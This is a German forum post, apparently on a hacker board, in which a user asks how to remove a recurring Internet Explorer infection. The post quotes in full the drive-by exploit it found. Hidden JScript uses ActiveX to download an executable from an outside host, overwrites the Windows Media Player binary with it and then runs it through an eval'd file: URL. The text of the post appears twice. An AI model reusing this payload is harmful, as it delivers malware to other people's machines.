![[HaBo]](/styles/default/logoklein.png){kind=small}
Hallöchen,
mir bereitet seit ein paar Stunden ein folgendes Problem Kopfschmerzen.
Offenbar ist es über IE möglich sich ein nettes Tool, vermutlich php-basierend zu catchen, das unter spy-botfinder als Doit-exploit läuft. Vermutlich legt sich das Ding mit der Norton-Wall an, und hat dort seine exe versteckt *ich versuche den logischen aspekt zu finden*, da beim Löschen zwar die datei an sich gelöscht wird, jedoch reproduziert sich dat fuckin teil dauernd. Wie gesagt es setzt sich essentiell an IE fest, und ich vermute fast, dass es auch mit der Norton Wall zusammenhängt.
Habe mir mal folgendes zur Hilfe genommen:
textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://the-invincible.fateback.com/jan.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Programme\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
Testing arround the corner... wait 10 secondes... says the_invincible
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines;
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
window.open("ieerror.php","_media");
setTimeout("doit()", 5000);
</script>
und es klingt für mich völlig plausibel. Wobei der mediaplayer vermutlich auch durch variable norton oder ähnlichen ersetzt werden kann.
Vielleicht hat ja einer von Euch eine Idee, wie ich das runterbringe, ohne dass ich erstmal den Rechner (der nedmal mein eigener ist) plattmachen muss.
Greetings,
mir bereitet seit ein paar Stunden ein folgendes Problem Kopfschmerzen.
Offenbar ist es über IE möglich sich ein nettes Tool, vermutlich php-basierend zu catchen, das unter spy-botfinder als Doit-exploit läuft. Vermutlich legt sich das Ding mit der Norton-Wall an, und hat dort seine exe versteckt *ich versuche den logischen aspekt zu finden*, da beim Löschen zwar die datei an sich gelöscht wird, jedoch reproduziert sich dat fuckin teil dauernd. Wie gesagt es setzt sich essentiell an IE fest, und ich vermute fast, dass es auch mit der Norton Wall zusammenhängt.
Habe mir mal folgendes zur Hilfe genommen:
textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://the-invincible.fateback.com/jan.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Programme\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
Testing arround the corner... wait 10 secondes... says the_invincible
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines;
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
window.open("ieerror.php","_media");
setTimeout("doit()", 5000);
</script>
und es klingt für mich völlig plausibel. Wobei der mediaplayer vermutlich auch durch variable norton oder ähnlichen ersetzt werden kann.
Vielleicht hat ja einer von Euch eine Idee, wie ich das runterbringe, ohne dass ich erstmal den Rechner (der nedmal mein eigener ist) plattmachen muss.
Greetings,